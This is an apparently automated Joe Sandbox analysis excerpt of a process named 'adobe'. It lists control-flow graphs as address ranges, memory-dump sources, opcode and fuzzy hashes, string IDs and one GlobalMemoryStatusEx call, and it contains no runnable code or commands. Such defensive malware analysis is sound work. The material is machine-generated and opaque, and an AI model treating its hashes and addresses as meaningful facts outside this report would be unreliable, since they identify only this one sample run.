                      control_flow_graph 1784 67d7cf8-67d7d16 1785 67d7d18-67d7d1b 1784->1785 1786 67d7d1d-67d7d39 1785->1786 1787 67d7d3e-67d7d41 1785->1787 1786->1787 1788 67d7d4e-67d7d51 1787->1788 1789 67d7d43-67d7d4d 1787->1789 1790 67d7d68-67d7d6b 1788->1790 1791 67d7d53-67d7d61 1788->1791 1793 67d7d6d-67d7d87 1790->1793 1794 67d7d8c-67d7d8e 1790->1794 1799 67d7d9e-67d7db4 1791->1799 1800 67d7d63 1791->1800 1793->1794 1796 67d7d95-67d7d98 1794->1796 1797 67d7d90 1794->1797 1796->1785 1796->1799 1797->1796 1804 67d7fcf-67d7fd9 1799->1804 1805 67d7dba-67d7dc3 1799->1805 1800->1790 1806 67d7dc9-67d7de6 1805->1806 1807 67d7fda-67d7fe2 1805->1807 1815 67d7fbc-67d7fc9 1806->1815 1816 67d7dec-67d7e14 1806->1816 1810 67d7fea 1807->1810 1811 67d7fe4-67d7fe9 1807->1811 1813 67d7fec-67d7fed 1810->1813 1814 67d7ff2-67d800f 1810->1814 1811->1810 1813->1814 1817 67d8011-67d8014 1814->1817 1815->1804 1815->1805 1816->1815 1837 67d7e1a-67d7e23 1816->1837 1818 67d801a-67d8026 1817->1818 1819 67d80c1-67d80c4 1817->1819 1825 67d8031-67d8033 1818->1825 1820 67d80e7-67d80ea 1819->1820 1821 67d80c6-67d80e2 1819->1821 1823 67d831f-67d8321 1820->1823 1824 67d80f0-67d80ff 1820->1824 1821->1820 1829 67d8328-67d832b 1823->1829 1830 67d8323 1823->1830 1842 67d811e-67d8162 1824->1842 1843 67d8101-67d811c 1824->1843 1826 67d804b-67d804f 1825->1826 1827 67d8035-67d803b 1825->1827 1834 67d805d 1826->1834 1835 67d8051-67d805b 1826->1835 1832 67d803d 1827->1832 1833 67d803f-67d8041 1827->1833 1829->1817 1836 67d8331-67d833a 1829->1836 1830->1829 1832->1826 1833->1826 1839 67d8062-67d8064 1834->1839 1835->1839 1837->1807 1841 67d7e29-67d7e45 1837->1841 1844 67d807b-67d80b4 1839->1844 1845 67d8066-67d8069 1839->1845 1852 67d7e4b-67d7e75 1841->1852 1853 67d7faa-67d7fb6 1841->1853 1849 67d8168-67d8179 1842->1849 1850 67d82f3-67d8309 1842->1850 1843->1842 1844->1824 1868 67d80b6-67d80c0 1844->1868 1845->1836 1859 67d817f-67d819c 1849->1859 1860 67d82de-67d82ed 1849->1860 1850->1823 1869 67d7e7b-67d7ea3 1852->1869 1870 67d7fa0-67d7fa5 1852->1870 1853->1815 1853->1837 1859->1860 1872 67d81a2-67d8298 call 67d6510 1859->1872 1860->1849 1860->1850 1869->1870 1878 67d7ea9-67d7ed7 1869->1878 1870->1853 1921 67d829a-67d82a4 1872->1921 1922 67d82a6 1872->1922 1878->1870 1883 67d7edd-67d7ee6 1878->1883 1883->1870 1884 67d7eec-67d7f1e 1883->1884 1892 67d7f29-67d7f45 1884->1892 1893 67d7f20-67d7f24 1884->1893 1892->1853 1895 67d7f47-67d7f9e call 67d6510 1892->1895 1893->1870 1894 67d7f26 1893->1894 1894->1892 1895->1853 1923 67d82ab-67d82ad 1921->1923 1922->1923 1923->1860 1924 67d82af-67d82b4 1923->1924 1925 67d82b6-67d82c0 1924->1925 1926 67d82c2 1924->1926 1927 67d82c7-67d82c9 1925->1927 1926->1927 1927->1860 1928 67d82cb-67d82d7 1927->1928 1928->1860
                      Strings
                      Memory Dump Source
                      • Source File: 00000008.00000002.4208993616.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_67d0000_adobe.jbxd
                      Similarity
                      • API ID:
                      • String ID: $kq$$kq
                      • API String ID: 0-3550614674
                      • Opcode ID: 41f0b5d72d7c6a6c91322288928335b77cd60b1cac7f25140f8c83acd1f89292
                      • Instruction ID: dcb435838c0663ca66e50186fdaf1330ba264ddb9f5b489132d3f2c7398cfdfc
                      • Opcode Fuzzy Hash: 41f0b5d72d7c6a6c91322288928335b77cd60b1cac7f25140f8c83acd1f89292
                      • Instruction Fuzzy Hash: DB02D330B006058FDB68DB65DA50A6EB7F2FF84314F248929E405DB399DB35EC86CB91
                      Memory Dump Source
                      • Source File: 00000008.00000002.4208993616.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_67d0000_adobe.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 9d741a9ddd7091e9f1020a43cb55b6c46e6dd210b41bd33e1777a4603a01bae1
                      • Instruction ID: c46af87a51068750dee78c61ed72a8c9cf3513060ed1ecf7866a3c26176dff0d
                      • Opcode Fuzzy Hash: 9d741a9ddd7091e9f1020a43cb55b6c46e6dd210b41bd33e1777a4603a01bae1
                      • Instruction Fuzzy Hash: C9629034B006049FDB54DB68D684BADBBF2EF84314F248869E506EB395DB35ED46CB80
                      Memory Dump Source
                      • Source File: 00000008.00000002.4208993616.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_67d0000_adobe.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: b237da3e29be180b504db37f39c9f4a368591092ca1617df878db4e6711e04ef
                      • Instruction ID: d1c3ff56dd8e5f282fb531e10d3a48a88215a97f4b2eb1f8d4678af8305c1b53
                      • Opcode Fuzzy Hash: b237da3e29be180b504db37f39c9f4a368591092ca1617df878db4e6711e04ef
                      • Instruction Fuzzy Hash: 3C329134B102098FDF55DB68DA80BAEB7B6FB88314F248925E505E7359DB35EC42CB90
                      Memory Dump Source
                      • Source File: 00000008.00000002.4208993616.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_67d0000_adobe.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: a5a727e43c094c66dacf035eca09ac9b98134dddba2f01cf2512cbc3561fb298
                      • Instruction ID: 42a22b2b35f261bb2a3fa365bed405df2c332aed40823f0394b9af56036e9abd
                      • Opcode Fuzzy Hash: a5a727e43c094c66dacf035eca09ac9b98134dddba2f01cf2512cbc3561fb298
                      • Instruction Fuzzy Hash: 1012D331F102059FEF60DB64D98067EBBB2EF85310F24886AE856DB395DA34EC41CB90

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 0 67dac40-67dac5e 1 67dac60-67dac63 0->1 2 67dac65-67dac6e 1->2 3 67dac73-67dac76 1->3 2->3 4 67dac99-67dac9c 3->4 5 67dac78-67dac94 3->5 6 67dac9e-67dacb1 4->6 7 67dacb6-67dacb9 4->7 5->4 6->7 8 67daccd-67dacd0 7->8 9 67dacbb-67dacc8 7->9 11 67dacda-67dacdd 8->11 12 67dacd2-67dacd7 8->12 9->8 15 67dacdf-67dace8 11->15 16 67dacf7-67dacfa 11->16 12->11 18 67dacee-67dacf2 15->18 19 67dae77-67dae82 15->19 20 67dae5d-67dae66 16->20 21 67dad00-67dad03 16->21 18->16 29 67dae8a 19->29 30 67dae84-67dae86 19->30 20->15 22 67dae6c-67dae76 20->22 23 67dad05-67dad09 21->23 24 67dad14-67dad16 21->24 23->22 26 67dad0f 23->26 27 67dad1d-67dad20 24->27 28 67dad18 24->28 26->24 27->1 31 67dad26-67dad4a 27->31 28->27 34 67dae8c-67dae8d 29->34 35 67dae92-67daeae 29->35 32 67dae8e 30->32 33 67dae88 30->33 45 67dae5a 31->45 46 67dad50-67dad5f 31->46 32->35 33->29 34->32 36 67daeb0-67daeb3 35->36 38 67daeb5-67daeb9 36->38 39 67daec0-67daec3 36->39 43 67daeef-67daf2a 38->43 44 67daebb 38->44 40 67daec5-67daee1 39->40 41 67daee6-67daee9 39->41 40->41 41->43 47 67db152-67db155 41->47 53 67db11d-67db130 43->53 54 67daf30-67daf3c 43->54 44->39 45->20 61 67dad77-67dadb2 call 67d6510 46->61 62 67dad61-67dad67 46->62 50 67db157-67db161 47->50 51 67db162-67db165 47->51 55 67db174-67db176 51->55 56 67db167 51->56 57 67db132 53->57 69 67daf5c-67dafa0 54->69 70 67daf3e-67daf57 54->70 58 67db17d-67db180 55->58 59 67db178 55->59 131 67db167 call 67db1a8 56->131 132 67db167 call 67db198 56->132 68 67db133 57->68 58->36 72 67db186-67db190 58->72 59->58 82 67dadca-67dade1 61->82 83 67dadb4-67dadba 61->83 64 67dad69 62->64 65 67dad6b-67dad6d 62->65 64->61 65->61 67 67db16d-67db16f 67->55 68->68 87 67dafbc-67daffb 69->87 88 67dafa2-67dafb4 69->88 70->57 95 67dadf9-67dae0a 82->95 96 67dade3-67dade9 82->96 85 67dadbc 83->85 86 67dadbe-67dadc0 83->86 85->82 86->82 93 67db001-67db0dc call 67d6510 87->93 94 67db0e2-67db0f7 87->94 88->87 93->94 94->53 104 67dae0c-67dae12 95->104 105 67dae22-67dae53 95->105 97 67daded-67dadef 96->97 98 67dadeb 96->98 97->95 98->95 107 67dae14 104->107 108 67dae16-67dae18 104->108 105->45 107->105 108->105 131->67 132->67
                      Strings
                      Memory Dump Source
                      • Source File: 00000008.00000002.4208993616.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_67d0000_adobe.jbxd
                      Similarity
                      • API ID:
                      • String ID: $kq$$kq$$kq$$kq$$kq$$kq$$kq$$kq
                      • API String ID: 0-1078448309
                      • Opcode ID: 1111f8e00cd1dcb6abb949244bb626110cc434ade40fc3d908e3c08b42351e80
                      • Instruction ID: 12d861145b60017987ce439e9827c179a9c7dcc5c56ad1afe3675bf4fd963782
                      • Opcode Fuzzy Hash: 1111f8e00cd1dcb6abb949244bb626110cc434ade40fc3d908e3c08b42351e80
                      • Instruction Fuzzy Hash: 55E18E30E1020A8FDF65DB69D5806AEB7B3FF84304F248929D405AB358DB35EC86CB90

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 882 67d90c8-67d90ed 883 67d90ef-67d90f2 882->883 884 67d90f8-67d910d 883->884 885 67d99b0-67d99b3 883->885 892 67d910f-67d9115 884->892 893 67d9125-67d913b 884->893 886 67d99d9-67d99db 885->886 887 67d99b5-67d99d4 885->887 889 67d99dd 886->889 890 67d99e2-67d99e5 886->890 887->886 889->890 890->883 891 67d99eb-67d99f5 890->891 895 67d9119-67d911b 892->895 896 67d9117 892->896 899 67d9146-67d9148 893->899 895->893 896->893 900 67d914a-67d9150 899->900 901 67d9160-67d91d1 899->901 902 67d9154-67d9156 900->902 903 67d9152 900->903 912 67d91fd-67d9219 901->912 913 67d91d3-67d91f6 901->913 902->901 903->901 918 67d921b-67d923e 912->918 919 67d9245-67d9260 912->919 913->912 918->919 924 67d928b-67d92a6 919->924 925 67d9262-67d9284 919->925 930 67d92a8-67d92c4 924->930 931 67d92cb-67d92d9 924->931 925->924 930->931 932 67d92e9-67d9363 931->932 933 67d92db-67d92e4 931->933 939 67d9365-67d9383 932->939 940 67d93b0-67d93c5 932->940 933->891 944 67d939f-67d93ae 939->944 945 67d9385-67d9394 939->945 940->885 944->939 944->940 945->944
                      Strings
                      Memory Dump Source
                      • Source File: 00000008.00000002.4208993616.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_67d0000_adobe.jbxd
                      Similarity
                      • API ID:
                      • String ID: $kq$$kq$$kq$$kq
                      • API String ID: 0-2881790790
                      • Opcode ID: d0c5cb14368c226b4892d7c712d50201183a9ce045cafe1a3dff3b918d2f8f14
                      • Instruction ID: 425126fc16904ad2b1599e5b8651d48880b3d823b68e2d51cd9f35c1faaba0d7
                      • Opcode Fuzzy Hash: d0c5cb14368c226b4892d7c712d50201183a9ce045cafe1a3dff3b918d2f8f14
                      • Instruction Fuzzy Hash: E0916E30F0060A8FDB64DF65DA517AEB7F6BF84244F108869C509EB798EB71EC418B91

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 948 67dcec8-67dcee3 949 67dcee5-67dcee8 948->949 950 67dceea-67dceef 949->950 951 67dcef2-67dcef5 949->951 950->951 952 67dcf3e-67dcf41 951->952 953 67dcef7-67dcf39 951->953 954 67dcf8a-67dcf8d 952->954 955 67dcf43-67dcf85 952->955 953->952 956 67dcf8f-67dcfd1 954->956 957 67dcfd6-67dcfd9 954->957 955->954 956->957 960 67dcfe8-67dcfeb 957->960 961 67dcfdb-67dcfdd 957->961 964 67dcfed-67dd02f 960->964 965 67dd034-67dd037 960->965 962 67dd26f-67dd278 961->962 963 67dcfe3 961->963 968 67dd27a-67dd27f 962->968 969 67dd287-67dd293 962->969 963->960 964->965 971 67dd039-67dd07b 965->971 972 67dd080-67dd083 965->972 968->969 974 67dd299-67dd2ad 969->974 975 67dd3a4-67dd3a9 969->975 971->972 978 67dd0cc-67dd0cf 972->978 979 67dd085-67dd0c7 972->979 997 67dd3b1 974->997 998 67dd2b3-67dd2c5 974->998 975->997 981 67dd118-67dd11b 978->981 982 67dd0d1-67dd113 978->982 979->978 985 67dd3b4-67dd3c0 981->985 986 67dd121-67dd124 981->986 982->981 995 67dd14c-67dd15b 985->995 996 67dd3c6-67dd6b3 985->996 993 67dd147-67dd14a 986->993 994 67dd126-67dd142 986->994 993->995 1001 67dd193-67dd196 993->1001 994->993 1002 67dd15d-67dd162 995->1002 1003 67dd16a-67dd176 995->1003 1160 67dd6b9-67dd6bf 996->1160 1161 67dd8da-67dd8e4 996->1161 997->985 1023 67dd2e9-67dd2eb 998->1023 1024 67dd2c7-67dd2cd 998->1024 1014 67dd198-67dd19a 1001->1014 1015 67dd1a5-67dd1a8 1001->1015 1002->1003 1012 67dd17c-67dd18e 1003->1012 1013 67dd8e5-67dd91e 1003->1013 1012->1001 1037 67dd920-67dd923 1013->1037 1014->997 1020 67dd1a0 1014->1020 1021 67dd1aa-67dd1ec 1015->1021 1022 67dd1f1-67dd1f4 1015->1022 1020->1015 1021->1022 1026 67dd1f6-67dd20c 1022->1026 1027 67dd211-67dd214 1022->1027 1036 67dd2f5-67dd301 1023->1036 1033 67dd2cf 1024->1033 1034 67dd2d1-67dd2dd 1024->1034 1026->1027 1038 67dd25d-67dd25f 1027->1038 1039 67dd216-67dd225 1027->1039 1042 67dd2df-67dd2e7 1033->1042 1034->1042 1064 67dd30f 1036->1064 1065 67dd303-67dd30d 1036->1065 1045 67dd925-67dd941 1037->1045 1046 67dd946-67dd949 1037->1046 1051 67dd266-67dd269 1038->1051 1052 67dd261 1038->1052 1047 67dd234-67dd240 1039->1047 1048 67dd227-67dd22c 1039->1048 1042->1036 1045->1046 1058 67dd97c-67dd97f 1046->1058 1059 67dd94b-67dd977 1046->1059 1047->1013 1057 67dd246-67dd258 1047->1057 1048->1047 1051->949 1051->962 1052->1051 1057->1038 1068 67dd98e-67dd990 1058->1068 1069 67dd981 1058->1069 1059->1058 1070 67dd314-67dd316 1064->1070 1065->1070 1072 67dd997-67dd99a 1068->1072 1073 67dd992 1068->1073 1207 67dd981 call 67dda3d 1069->1207 1208 67dd981 call 67dda50 1069->1208 1070->997 1075 67dd31c-67dd338 call 67d6510 1070->1075 1072->1037 1079 67dd99c-67dd9ab 1072->1079 1073->1072 1091 67dd33a-67dd33f 1075->1091 1092 67dd347-67dd353 1075->1092 1078 67dd987-67dd989 1078->1068 1085 67dd9ad-67dda10 call 67d6510 1079->1085 1086 67dda12-67dda27 1079->1086 1085->1086 1091->1092 1092->975 1094 67dd355-67dd3a2 1092->1094 1094->997 1162 67dd6ce-67dd6d7 1160->1162 1163 67dd6c1-67dd6c6 1160->1163 1162->1013 1164 67dd6dd-67dd6f0 1162->1164 1163->1162 1166 67dd8ca-67dd8d4 1164->1166 1167 67dd6f6-67dd6fc 1164->1167 1166->1160 1166->1161 1168 67dd6fe-67dd703 1167->1168 1169 67dd70b-67dd714 1167->1169 1168->1169 1169->1013 1170 67dd71a-67dd73b 1169->1170 1173 67dd73d-67dd742 1170->1173 1174 67dd74a-67dd753 1170->1174 1173->1174 1174->1013 1175 67dd759-67dd776 1174->1175 1175->1166 1178 67dd77c-67dd782 1175->1178 1178->1013 1179 67dd788-67dd7a1 1178->1179 1181 67dd8bd-67dd8c4 1179->1181 1182 67dd7a7-67dd7ce 1179->1182 1181->1166 1181->1178 1182->1013 1185 67dd7d4-67dd7de 1182->1185 1185->1013 1186 67dd7e4-67dd7fb 1185->1186 1188 67dd7fd-67dd808 1186->1188 1189 67dd80a-67dd825 1186->1189 1188->1189 1189->1181 1194 67dd82b-67dd844 call 67d6510 1189->1194 1198 67dd846-67dd84b 1194->1198 1199 67dd853-67dd85c 1194->1199 1198->1199 1199->1013 1200 67dd862-67dd8b6 1199->1200 1200->1181 1207->1078 1208->1078
                      Strings
                      Memory Dump Source
                      • Source File: 00000008.00000002.4208993616.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_67d0000_adobe.jbxd
                      Similarity
                      • API ID:
                      • String ID: $kq$$kq$$kq
                      • API String ID: 0-2086306503
                      • Opcode ID: a4ef5e851332812e4491fd50a833aa456b8fea5d02fd2eba6cf1fbe14640e563
                      • Instruction ID: 012c78b921718d86a85568bf6f2fd2892c33cb98377f88bfdfd21214b1f4346e
                      • Opcode Fuzzy Hash: a4ef5e851332812e4491fd50a833aa456b8fea5d02fd2eba6cf1fbe14640e563
                      • Instruction Fuzzy Hash: 6E626334A00206CFCB65EF68D680A5EB7B2FF84304F248969D4059F769DB75ED86CB84

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1209 67d4b18-67d4b3c 1211 67d4b3e-67d4b41 1209->1211 1212 67d4b47-67d4c3f 1211->1212 1213 67d5220-67d5223 1211->1213 1233 67d4c45-67d4c8d 1212->1233 1234 67d4cc2-67d4cc9 1212->1234 1214 67d5225-67d523f 1213->1214 1215 67d5244-67d5246 1213->1215 1214->1215 1217 67d524d-67d5250 1215->1217 1218 67d5248 1215->1218 1217->1211 1220 67d5256-67d5263 1217->1220 1218->1217 1255 67d4c92 call 67d53d0 1233->1255 1256 67d4c92 call 67d53c3 1233->1256 1235 67d4d4d-67d4d56 1234->1235 1236 67d4ccf-67d4d3f 1234->1236 1235->1220 1253 67d4d4a 1236->1253 1254 67d4d41 1236->1254 1247 67d4c98-67d4cb4 1250 67d4cbf 1247->1250 1251 67d4cb6 1247->1251 1250->1234 1251->1250 1253->1235 1254->1253 1255->1247 1256->1247
                      Strings
                      Memory Dump Source
                      • Source File: 00000008.00000002.4208993616.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_67d0000_adobe.jbxd
                      Similarity
                      • API ID:
                      • String ID: fpq$XPpq$\Opq
                      • API String ID: 0-2571271785
                      • Opcode ID: f8041385421ba5f1dbf87ff5e06b40f6ee0773d2c0684faa4519d353db9c9d36
                      • Instruction ID: f6590688fa4639f946af1b2bdd566a61e0e9df0898c6ac4fb7314ffea4983b24
                      • Opcode Fuzzy Hash: f8041385421ba5f1dbf87ff5e06b40f6ee0773d2c0684faa4519d353db9c9d36
                      • Instruction Fuzzy Hash: E5619170F002089FEB549BA4C8157AEBAF6EF88300F20842AE506EB395DE749C459B95

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1930 67d90bb-67d90be 1931 67d90c6-67d90ed 1930->1931 1932 67d90c0-67d90c4 1930->1932 1933 67d90ef-67d90f2 1931->1933 1932->1931 1934 67d90f8-67d910d 1933->1934 1935 67d99b0-67d99b3 1933->1935 1942 67d910f-67d9115 1934->1942 1943 67d9125-67d913b 1934->1943 1936 67d99d9-67d99db 1935->1936 1937 67d99b5-67d99d4 1935->1937 1939 67d99dd 1936->1939 1940 67d99e2-67d99e5 1936->1940 1937->1936 1939->1940 1940->1933 1941 67d99eb-67d99f5 1940->1941 1945 67d9119-67d911b 1942->1945 1946 67d9117 1942->1946 1949 67d9146-67d9148 1943->1949 1945->1943 1946->1943 1950 67d914a-67d9150 1949->1950 1951 67d9160-67d91d1 1949->1951 1952 67d9154-67d9156 1950->1952 1953 67d9152 1950->1953 1962 67d91fd-67d9219 1951->1962 1963 67d91d3-67d91f6 1951->1963 1952->1951 1953->1951 1968 67d921b-67d923e 1962->1968 1969 67d9245-67d9260 1962->1969 1963->1962 1968->1969 1974 67d928b-67d92a6 1969->1974 1975 67d9262-67d9284 1969->1975 1980 67d92a8-67d92c4 1974->1980 1981 67d92cb-67d92d9 1974->1981 1975->1974 1980->1981 1982 67d92e9-67d9363 1981->1982 1983 67d92db-67d92e4 1981->1983 1989 67d9365-67d9383 1982->1989 1990 67d93b0-67d93c5 1982->1990 1983->1941 1994 67d939f-67d93ae 1989->1994 1995 67d9385-67d9394 1989->1995 1990->1935 1994->1989 1994->1990 1995->1994
                      Strings
                      Memory Dump Source
                      • Source File: 00000008.00000002.4208993616.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_67d0000_adobe.jbxd
                      Similarity
                      • API ID:
                      • String ID: $kq$$kq
                      • API String ID: 0-3550614674
                      • Opcode ID: ac5501a273efa44c2b32427b6f331ef78427bed1a9c8ea436c8db3248afced79
                      • Instruction ID: b419472e6205affc144a9ab969b3c998c0675e01053c5054c35f0b84378c4be7
                      • Opcode Fuzzy Hash: ac5501a273efa44c2b32427b6f331ef78427bed1a9c8ea436c8db3248afced79
                      • Instruction Fuzzy Hash: D7515030F005098FDB54DF75DA91BAE77F6EB84644F108869C909DB798EA71EC02CB91

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1998 108ed33-108ed3a 1999 108ed3c 1998->1999 2000 108ed42-108ed4b 1998->2000 1999->2000 2001 108ed4d-108ed74 2000->2001 2002 108ed75-108ed8b 2000->2002 2026 108ed8d call 108ee18 2002->2026 2027 108ed8d call 108ed33 2002->2027 2005 108ed92-108ed94 2006 108ed9a-108edd2 2005->2006 2007 108ed96-108ed99 2005->2007 2012 108edda 2006->2012 2013 108edd4-108edd8 2006->2013 2014 108eddc-108edde 2012->2014 2015 108ede2-108edf9 2012->2015 2013->2012 2014->2015 2018 108edfb-108edfe 2015->2018 2019 108edff-108ee8c GlobalMemoryStatusEx 2015->2019 2022 108ee8e-108ee94 2019->2022 2023 108ee95-108eebd 2019->2023 2022->2023 2026->2005 2027->2005
                      Memory Dump Source
                      • Source File: 00000008.00000002.4197902069.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_1080000_adobe.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 1ee0b45372a9c60383390f63dcd52e63c65ae162c37ba0efe34bae31baf81fdf
                      • Instruction ID: 18d6f5924ad1df78eb2f5b39b29673e3dfb1caee05d9abf6e1c734e0d1331f23
                      • Opcode Fuzzy Hash: 1ee0b45372a9c60383390f63dcd52e63c65ae162c37ba0efe34bae31baf81fdf
                      • Instruction Fuzzy Hash: 99413571D083958FC705EF69C8042AEBFF1AF8A310F1485AAD584EB291DB349845CBA1

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 2028 108ee18-108ee8c GlobalMemoryStatusEx 2030 108ee8e-108ee94 2028->2030 2031 108ee95-108eebd 2028->2031 2030->2031
                      APIs
                      • GlobalMemoryStatusEx.KERNELBASE ref: 0108EE7F
                      Memory Dump Source
                      • Source File: 00000008.00000002.4197902069.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_1080000_adobe.jbxd
                      Similarity
                      • API ID: GlobalMemoryStatus
                      • String ID:
                      • API String ID: 1890195054-0
                      • Opcode ID: 03f021b3f8edfe15d0bb2ca6de0dbbb5fdf0c92b0c88f65fae9f4abe5aa37242
                      • Instruction ID: 97388db8a2eff5c206ce1046cc5319f5accedb780f84b5e6b92bb296315dc815
                      • Opcode Fuzzy Hash: 03f021b3f8edfe15d0bb2ca6de0dbbb5fdf0c92b0c88f65fae9f4abe5aa37242
                      • Instruction Fuzzy Hash: 691120B1C006699BDB10DF9AC444BDEFBF4AF48320F14816AD858B7241D378A944CFE5

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 2189 67d4b09-67d4b0e 2190 67d4b16 2189->2190 2191 67d4b10 2189->2191 2192 67d4b1a-67d4b31 2190->2192 2193 67d4b33-67d4b3c 2191->2193 2194 67d4b12 2191->2194 2192->2193 2195 67d4b3e-67d4b41 2193->2195 2194->2192 2196 67d4b14-67d4b15 2194->2196 2197 67d4b47-67d4c3f 2195->2197 2198 67d5220-67d5223 2195->2198 2196->2190 2218 67d4c45-67d4c8d 2197->2218 2219 67d4cc2-67d4cc9 2197->2219 2199 67d5225-67d523f 2198->2199 2200 67d5244-67d5246 2198->2200 2199->2200 2202 67d524d-67d5250 2200->2202 2203 67d5248 2200->2203 2202->2195 2205 67d5256-67d5263 2202->2205 2203->2202 2240 67d4c92 call 67d53d0 2218->2240 2241 67d4c92 call 67d53c3 2218->2241 2220 67d4d4d-67d4d56 2219->2220 2221 67d4ccf-67d4d3f 2219->2221 2220->2205 2238 67d4d4a 2221->2238 2239 67d4d41 2221->2239 2232 67d4c98-67d4cb4 2235 67d4cbf 2232->2235 2236 67d4cb6 2232->2236 2235->2219 2236->2235 2238->2220 2239->2238 2240->2232 2241->2232
                      Strings
                      Memory Dump Source
                      • Source File: 00000008.00000002.4208993616.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_67d0000_adobe.jbxd
                      Similarity
                      • API ID:
                      • String ID: XPpq
                      • API String ID: 0-1266478781
                      • Opcode ID: 313ae49d3cc36d9dd540427b15a28e2d393a6d2f542fa45599278156536670ab
                      • Instruction ID: 8ebab9e2b83dda4f733b388b1ed2dc6f0875fd396db4b3059c35ed8bfed1e515
                      • Opcode Fuzzy Hash: 313ae49d3cc36d9dd540427b15a28e2d393a6d2f542fa45599278156536670ab
                      • Instruction Fuzzy Hash: D2519170F102089FDB54DFA4C914BAEBBF6AF88300F20852AE505AB3A9DE749C05DB54

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 2242 67dda50-67dda67 2243 67dda69-67dda6c 2242->2243 2244 67dda9f-67ddaa2 2243->2244 2245 67dda6e-67dda9a 2243->2245 2246 67ddaa4 2244->2246 2247 67ddab1-67ddab4 2244->2247 2245->2244 2252 67ddaaa-67ddaac 2246->2252 2248 67ddad7-67ddad9 2247->2248 2249 67ddab6-67ddad2 2247->2249 2250 67ddadb 2248->2250 2251 67ddae0-67ddae3 2248->2251 2249->2248 2250->2251 2251->2243 2254 67ddae5-67ddaf4 2251->2254 2252->2247 2257 67ddc79-67ddca3 2254->2257 2258 67ddafa-67ddb33 2254->2258 2261 67ddca4 2257->2261 2265 67ddb35-67ddb3f 2258->2265 2266 67ddb81-67ddba5 2258->2266 2261->2261 2270 67ddb57-67ddb7f 2265->2270 2271 67ddb41-67ddb47 2265->2271 2272 67ddbaf-67ddc73 2266->2272 2273 67ddba7 2266->2273 2270->2265 2270->2266 2274 67ddb49 2271->2274 2275 67ddb4b-67ddb4d 2271->2275 2272->2257 2272->2258 2273->2272 2274->2270 2275->2270
                      Strings
                      Memory Dump Source
                      • Source File: 00000008.00000002.4208993616.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_67d0000_adobe.jbxd
                      Similarity
                      • API ID:
                      • String ID: PHkq
                      • API String ID: 0-902561536
                      • Opcode ID: 5a7856409005aed9a0b1b6678c69bce7a0c89f0582722d8ffe5f9064ade57696
                      • Instruction ID: c8bb3281181101241496be6760443f869ee1bc2c28192f234ab1f9a9cdeed679
                      • Opcode Fuzzy Hash: 5a7856409005aed9a0b1b6678c69bce7a0c89f0582722d8ffe5f9064ade57696
                      • Instruction Fuzzy Hash: CC416070E00209DFDB64DF65C5846AEBBB6BF85344F208929E405E7250EF74E946CB81

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 2318 67d21b5-67d21e3 2319 67d21e5-67d21e8 2318->2319 2320 67d220b-67d220d 2319->2320 2321 67d21ea-67d2206 2319->2321 2322 67d220f 2320->2322 2323 67d2214-67d2217 2320->2323 2321->2320 2322->2323 2323->2319 2325 67d2219-67d223f 2323->2325 2330 67d2246-67d2274 2325->2330 2335 67d22eb-67d230f 2330->2335 2336 67d2276-67d2280 2330->2336 2344 67d2319 2335->2344 2345 67d2311 2335->2345 2339 67d2298-67d22e9 2336->2339 2340 67d2282-67d2288 2336->2340 2339->2335 2339->2336 2342 67d228c-67d228e 2340->2342 2343 67d228a 2340->2343 2342->2339 2343->2339 2347 67d231a 2344->2347 2345->2344 2347->2347
                      Strings
                      Memory Dump Source
                      • Source File: 00000008.00000002.4208993616.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
